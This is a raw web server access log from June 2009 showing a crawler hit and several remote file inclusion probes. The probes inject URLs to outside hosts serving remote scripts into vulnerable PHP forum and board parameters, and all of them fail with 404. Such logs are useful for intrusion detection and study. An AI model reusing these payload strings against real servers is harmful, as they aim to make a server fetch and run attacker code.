38.99.13.118 - - [16/Jun/2009:01:19:10 -0400] "GET /logs/access_log.Q108072600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.175.71.121 - - [16/Jun/2009:01:19:14 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:14 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:14 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:19:16 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:16 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:16 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:19:18 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
